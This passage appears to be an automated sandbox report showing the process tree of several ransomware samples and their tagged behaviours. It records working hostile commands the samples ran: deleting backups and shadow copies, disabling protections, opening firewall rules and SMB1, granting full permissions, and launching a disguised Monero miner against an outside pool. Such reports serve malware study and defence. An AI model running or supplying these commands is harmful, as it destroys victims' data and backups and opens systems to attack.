    • Suspicious use of FindShellTrayWindow
    PID:3500
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2724
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /1
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:4352
      • C:\Windows\system32\taskmgr.exe
        "C:\Windows\system32\taskmgr.exe" /1
        3⤵
        • Checks SCSI registry key(s)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:5020
        • C:\Windows\system32\taskmgr.exe
          "C:\Windows\system32\taskmgr.exe" /1
          4⤵
          • Checks SCSI registry key(s)
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          PID:1124
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1308
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3704
      • C:\Users\Admin\Desktop\00438\HEUR-Trojan-Ransom.MSIL.Blocker.gen-457696712ef10e20bc0a672339276c2217fa95248aa4cf7b7c6674467fa87c1a.exe
        HEUR-Trojan-Ransom.MSIL.Blocker.gen-457696712ef10e20bc0a672339276c2217fa95248aa4cf7b7c6674467fa87c1a.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4292
        • C:\Users\Admin\AppData\Local\Temp\Services.exe
          "C:\Users\Admin\AppData\Local\Temp\Services.exe"
          4⤵
            PID:1936
            • C:\WINDOWS\System32\svchost.exe
              C:\WINDOWS\System32\svchost.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6067559 --pass=myminer999700 --cpu-max-threads-hint=30 --donate-level=5 --unam-idle-wait=2 --unam-idle-cpu=60 --unam-stealth
              5⤵
                PID:3312
          • C:\Users\Admin\Desktop\00438\HEUR-Trojan-Ransom.MSIL.Blocker.gen-6985ca2facf06e870837580eaf54f55e888ade4818f617a2076bf63766418c62.exe
            HEUR-Trojan-Ransom.MSIL.Blocker.gen-6985ca2facf06e870837580eaf54f55e888ade4818f617a2076bf63766418c62.exe
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4164
            • C:\Users\Admin\AppData\Roaming\HEUR-Trojan-Ransom.MSIL.Blocker.gen-6985ca2facf06e870837580eaf54f55e888ade4818f617a2076bf63766418c62.exe
              "C:\Users\Admin\AppData\Roaming\HEUR-Trojan-Ransom.MSIL.Blocker.gen-6985ca2facf06e870837580eaf54f55e888ade4818f617a2076bf63766418c62.exe"
              4⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • System Location Discovery: System Language Discovery
              PID:4904
          • C:\Users\Admin\Desktop\00438\HEUR-Trojan-Ransom.MSIL.Crypmodng.gen-4c3044d3ae26b890c62521caaec7697b4c5dbc387f6464233252cce6832ae758.exe
            HEUR-Trojan-Ransom.MSIL.Crypmodng.gen-4c3044d3ae26b890c62521caaec7697b4c5dbc387f6464233252cce6832ae758.exe
            3⤵
            • Executes dropped EXE
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            PID:4380
          • C:\Users\Admin\Desktop\00438\HEUR-Trojan-Ransom.MSIL.Crypren.gen-77407ac01fcf8a3c00b252aeaacacef40fd69406a24896d00ea028a46679374c.exe
            HEUR-Trojan-Ransom.MSIL.Crypren.gen-77407ac01fcf8a3c00b252aeaacacef40fd69406a24896d00ea028a46679374c.exe
            3⤵
            • Executes dropped EXE
            • Drops desktop.ini file(s)
            • System Location Discovery: System Language Discovery
            PID:3048
          • C:\Users\Admin\Desktop\00438\HEUR-Trojan-Ransom.MSIL.Encoder.gen-a337dd332b5325f1ada28c9a3da440efb3f73ab2d877edbef4edfd4c133ad578.exe
            HEUR-Trojan-Ransom.MSIL.Encoder.gen-a337dd332b5325f1ada28c9a3da440efb3f73ab2d877edbef4edfd4c133ad578.exe
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:408
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qhroxkim\qhroxkim.cmdline"
              4⤵
                PID:8028
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7805.tmp" "c:\Users\Admin\AppData\Local\Temp\qhroxkim\CSC3B60C9D2E9C449918E4CC130A87615C6.TMP"
                  5⤵
                    PID:6792
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
                  4⤵
                    PID:8564
                  • C:\Windows\SysWOW64\sc.exe
                    "C:\Windows\System32\sc.exe" config SQLTELEMETRY start= disabled
                    4⤵
                    • Launches sc.exe
                    PID:6800
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" del /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk
                    4⤵
                      PID:7024
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" del /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk
                      4⤵
                        PID:6104
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" del /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk
                        4⤵
                          PID:7808
                        • C:\Windows\SysWOW64\sc.exe
                          "C:\Windows\System32\sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                          4⤵
                          • Launches sc.exe
                          PID:8832
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" del /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk
                          4⤵
                            PID:7932
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" del /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk
                            4⤵
                              PID:8852
                            • C:\Windows\SysWOW64\sc.exe
                              "C:\Windows\System32\sc.exe" config SQLWriter start= disabled
                              4⤵
                              • Launches sc.exe
                              PID:7748
                            • C:\Windows\SysWOW64\sc.exe
                              "C:\Windows\System32\sc.exe" config SstpSvc start= disabled
                              4⤵
                              • Launches sc.exe
                              PID:8880
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-CimInstance Win32_ShadowCopy | Remove-CimInstance
                              4⤵
                                PID:8848
                              • C:\Windows\SysWOW64\sc.exe
                                "C:\Windows\System32\sc.exe" config MBAMService start= disabled
                                4⤵
                                • Launches sc.exe
                                PID:8208
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:10080
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
                                4⤵
                                  PID:2020
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c rd /s /q D:\\$Recycle.bin
                                  4⤵
                                    PID:7868
                                  • C:\Windows\SysWOW64\sc.exe
                                    "C:\Windows\System32\sc.exe" config fdPHost start= auto
                                    4⤵
                                    • Launches sc.exe
                                    PID:6152
                                  • C:\Windows\SysWOW64\sc.exe
                                    "C:\Windows\System32\sc.exe" config FDResPub start= auto
                                    4⤵
                                    • Launches sc.exe
                                    PID:2032
                                  • C:\Windows\SysWOW64\sc.exe
                                    "C:\Windows\System32\sc.exe" config Dnscache start= auto
                                    4⤵
                                    • Launches sc.exe
                                    PID:8328
                                  • C:\Windows\SysWOW64\sc.exe
                                    "C:\Windows\System32\sc.exe" config SSDPSRV start= auto
                                    4⤵
                                    • Launches sc.exe
                                    PID:3592
                                  • C:\Windows\SysWOW64\sc.exe
                                    "C:\Windows\System32\sc.exe" config upnphost start= auto
                                    4⤵
                                    • Launches sc.exe
                                    PID:7928
                                  • C:\Windows\SysWOW64\netsh.exe
                                    "C:\Windows\System32\netsh.exe" advfirewall firewall set rule group="Network Discovery" new enable=Yes
                                    4⤵
                                    • Modifies Windows Firewall
                                    PID:9620
                                  • C:\Windows\SysWOW64\netsh.exe
                                    "C:\Windows\System32\netsh.exe" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
                                    4⤵
                                    • Modifies Windows Firewall
                                    PID:4272
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
                                    4⤵
                                      PID:8736
                                    • C:\Windows\SysWOW64\mountvol.exe
                                      "mountvol.exe"
                                      4⤵
                                        PID:6956
                                      • C:\Windows\SysWOW64\mountvol.exe
                                        "C:\Windows\System32\mountvol.exe" A: \\?\Volume{f0eec59f-0000-0000-0000-100000000000}\
                                        4⤵
                                          PID:6804
                                        • C:\Windows\SysWOW64\mountvol.exe
                                          "C:\Windows\System32\mountvol.exe" B: \\?\Volume{f0eec59f-0000-0000-0000-d01200000000}\
                                          4⤵
                                            PID:3520
                                          • C:\Windows\SysWOW64\mountvol.exe
                                            "C:\Windows\System32\mountvol.exe" E: \\?\Volume{f0eec59f-0000-0000-0000-f0ff3a000000}\
                                            4⤵
                                              PID:7284
                                            • C:\Windows\SysWOW64\mountvol.exe
                                              "C:\Windows\System32\mountvol.exe" G: \\?\Volume{fccd7e5e-84cd-11ef-934d-806e6f6e6963}\
                                              4⤵
                                                PID:6120
                                              • C:\Windows\SysWOW64\icacls.exe
                                                "C:\Windows\System32\icacls.exe" "C:*" /grant Everyone:F /T /C /Q
                                                4⤵
                                                • Modifies file permissions
                                                PID:4176
                                              • C:\Windows\SysWOW64\icacls.exe
                                                "C:\Windows\System32\icacls.exe" "Z:*" /grant Everyone:F /T /C /Q
                                                4⤵
                                                • Modifies file permissions
                                                PID:8284
                                              • C:\Windows\SysWOW64\icacls.exe
                                                "C:\Windows\System32\icacls.exe" "D:*" /grant Everyone:F /T /C /Q
                                                4⤵
                                                • Modifies file permissions
                                                PID:8748
                                              • C:\Windows\SysWOW64\arp.exe
                                                "arp" -a
                                                4⤵
                                                • Network Service Discovery
                                                PID:6888
                                              • C:\Windows\SysWOW64\net.exe
                                                "net.exe" view
                                                4⤵
                                                • Discovers systems in the same network
                                                PID:7740
                                            • C:\Users\Admin\Desktop\00438\HEUR-Trojan-Ransom.MSIL.Foreign.gen-d70138bbb3687aa31b35ff4aadac1ffe6569de225981f299b8853bc69c0fc39e.exe
                                              HEUR-Trojan-Ransom.MSIL.Foreign.gen-d70138bbb3687aa31b35ff4aadac1ffe6569de225981f299b8853bc69c0fc39e.exe
                                              3⤵
                                              • Checks computer location settings
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              • Modifies registry class
                                              • Suspicious use of WriteProcessMemory
                                              PID:1752
                                              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Documents\HEUR-Trojan-Ransom.MSIL.Foreign.gen-d70138bbb3687aa31b35ff4aadac1ffe6569de225981f299b8853bc69c0fc39e .pdf"
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                • Checks processor information in registry
                                                • Modifies Internet Explorer settings
                                                • Suspicious use of SetWindowsHookEx
                                                • Suspicious use of WriteProcessMemory
                                                PID:3028
                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                                  5⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:2008
                                                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=D1FF151C98017A221F61A9116511E6E1 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=D1FF151C98017A221F61A9116511E6E1 --renderer-client-id=2 --mojo-platform-channel-handle=1680 --allow-no-sandbox-job /prefetch:1
                                                    6⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:4376
                                                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7FED3D62E4FF03CFF528DC4A3300F3F2 --mojo-platform-channel-handle=1940 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                    6⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:3772
                                                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=20B20A7672B7D5BCD76B0862277F7DF8 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=20B20A7672B7D5BCD76B0862277F7DF8 --renderer-client-id=4 --mojo-platform-channel-handle=2296 --allow-no-sandbox-job /prefetch:1
                                                    6⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:5204
                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                                  5⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:5996
                                                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=66A15D5F7A1477505D61F89F16CBB75E --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=66A15D5F7A1477505D61F89F16CBB75E --renderer-client-id=2 --mojo-platform-channel-handle=1664 --allow-no-sandbox-job /prefetch:1
                                                    6⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:9968
                                                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=1C27F48898E03944D3E85FE92D6A9B54 --mojo-platform-channel-handle=1924 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                    6⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:9980
                                                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=15A4620F756B1E6258D4C052924D4A81 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=15A4620F756B1E6258D4C052924D4A81 --renderer-client-id=4 --mojo-platform-channel-handle=2284 --allow-no-sandbox-job /prefetch:1
                                                    6⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:8048
                                                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5750C9F6F3ECFD2DE866D76A440F12CB --mojo-platform-channel-handle=2560 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                    6⤵
                                                      PID:8596
                                              • C:\Users\Admin\Desktop\00438\HEUR-Trojan-Ransom.Win32.Darkside.gen-2e219a91f5b80906ede1b19c7fc22572322049f45b85732ec29f10fee3268ee6.exe
                                                HEUR-Trojan-Ransom.Win32.Darkside.gen-2e219a91f5b80906ede1b19c7fc22572322049f45b85732ec29f10fee3268ee6.exe
                                                3⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:3068
                                              • C:\Users\Admin\Desktop\00438\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-dcca24b81b379cb885b4fa4abe534965dfff26bb58684d2e682c80a5c6ec4768.exe
                                                HEUR-Trojan-Ransom.Win32.GandCrypt.gen-dcca24b81b379cb885b4fa4abe534965dfff26bb58684d2e682c80a5c6ec4768.exe
                                                3⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
